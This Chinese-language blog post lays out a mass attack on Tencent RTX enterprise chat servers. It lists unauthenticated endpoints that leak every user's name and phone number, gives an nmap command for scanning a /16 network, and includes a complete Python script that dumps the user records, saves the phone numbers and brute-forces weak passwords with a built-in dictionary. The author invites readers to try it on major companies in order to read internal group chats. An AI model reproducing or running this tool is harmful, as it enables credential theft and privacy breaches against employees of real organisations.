rtx信息泄漏利结合弱口令导致被批量社工思路

时间:2022-01-28 00:23:52

腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.

rtx server 存在暴露用户信息的漏洞,通过web访问

http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令

脚本化攻击思路:

  1. sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来填补精度的不足,然后我们得到一个开着nmap扫描的out.xml文
  2. 分析out.xml文件提取开放8012端口的ip
  3. rtx攻击脚本处理这些ip,探测弱口令

步骤2 分析nmap结果的脚本xml.py

#!/usr/bin/env python
#
-*- coding= utf-8 -*-
import xml.etree.ElementTree as ET

tree
= ET.parse("out.xml")
doc
= tree.getroot()
for x in doc:
if x.tag == 'host':
xlist
= x.getchildren()
ports
= xlist[3]
port
= ports.getchildren()[0]
state
= port.getchildren()[0]
if state.get('state') == 'open':
print xlist[1].get('addr')

 

步骤3 rtx server attack 脚本

#!/usr/bin/env python
#
-*-coding=utf-8-*-
#
date : 2013.12.16
#
author : l137
#
rtx hack

import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time

def usage():
print '''
Usage : ./f.py -u target_ip
-h Show this page!
'''

class postThread(threading.Thread):

def __init__(self, data):
threading.Thread.
__init__(self)
self.data
= data
def run(self):
for x in self.data:
try:
print self.data
except Exception, e:
print e


class rtx(object):
'rtx attacker class'
ip
= ''

data
= ''

port
= '8012'

fullData
= ''


def __init__(self, ip):
if self.checkIp(ip):
self.ip
= ip
url
= "http://"+ip+":"+self.port+"/userlist.php"
try:
content
= urllib.urlopen(url).read()
self.data
= json.loads(content)
except (IOError,ValueError),e:
print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!"
sys.exit()
self.checkVulnerable()
#print self.data
self.checkPhone()
self.bruteforce()
else:
print " ______________"
print " \033[07m are you kidding me? \033[27m "
print " \ "
print " \ \033[1;31m,__,\033[1;m "
print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m "
print " \033[1;31m(__) )\ \033[1;m "
print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n"


@staticmethod
def checkIp(ip):
pattern
= r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
if re.match(pattern, ip):
return True
else:
return False

def checkVulnerable(self):
print "\033[1;31m Oh...I got something!!"
print " Please wait a bit....."
#for x in range(len(self.data)):
# print self.data[x]
print " "+str(len(self.data))+" records was found!! \033[0m"

def checkPhone(self):
print "\033[1;31m Now check phone number in records.....\033[0m"
url
= "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
output
= file('out.txt','w')
for x in xrange(0,len(self.data)):
url2
= url + self.data[x]['name']
self.data[x][
'phone'] = urllib.urlopen(url2).read()
try:
output.write(str(self.data[x][
'id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n')
print self.data[x]
except Exception,e:
print e
output.close()
print "\033[1;31m put the records int out.txt\033[0m"
#print self.data

def bruteforce(self):
print "\033[1;31m Brute force starting...."
num
= raw_input(" Please input the number of threads for brute force(default 10) : ")
print " And it will take a little time ...\033[0m"
if num == '':
num
= 10
else :
try :
num
= int(num)
except ValueError,e:
print e
sys.exit()
if (num < 1) or (num > 15):
print "threads must in 1-15"
sys.exit()

threads
= [];
block
= len(self.data)/num
for i in xrange(0, num):
if i == num-1:
data
= self.data[block*i:]
else:
data
= self.data[i*block:(i+1)*block]
t
= threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
threads.append(t)
for i in threads:
i.start()

@staticmethod
def fwork(port,ip,b):
for x in xrange(0,len(b)):
dicts
= ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
#dicts.append(b[x]['phone'])
dicts.append(b[x]['name'])
for x in dicts:
httpClient
= None
try:
name
= dicts[-1]
postData
= urllib.urlencode({'user':name,'pwd':x})
headers
= {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
httpClient
= httplib.HTTPConnection(ip, port, timeout=30)
httpClient.request(
"POST", "/check.php", postData, headers)
response
= httpClient.getresponse()
responseHeader
= response.getheaders()
if responseHeader[1][1] == '2573':
print name,x
except Exception, e:
print e
finally:
httpClient.close()
def getWeakPass(self):
file_ob
= open("password.txt")
try:
list_file
= file_ob.readlines()
finally:
file_ob.close()
for x in list_file:
self.dists.append(x.strip(
'\n'))

def main():
try:
opts, args
= getopt.getopt(sys.argv[1:], "u:h", ["help"])
except getopt.GetoptError:
usage()
sys.exit()
for o,a in opts:
if o in ("-h", "--help"):
usage()
elif o == "-u":
r
= rtx(a)
else :
usage()
if len(opts) == 0:
usage()

if __name__ == "__main__" :
main()

这里会获取很多很重要公司的员工rtx帐号,进入内网后可以窃取群聊内容.大家自己试试就行...

截图:

964条记录

rtx信息泄漏利结合弱口令导致被批量社工思路

rtx信息泄漏利结合弱口令导致被批量社工思路

参考:

http://www.wooyun.org/bugs/wooyun-2010-013290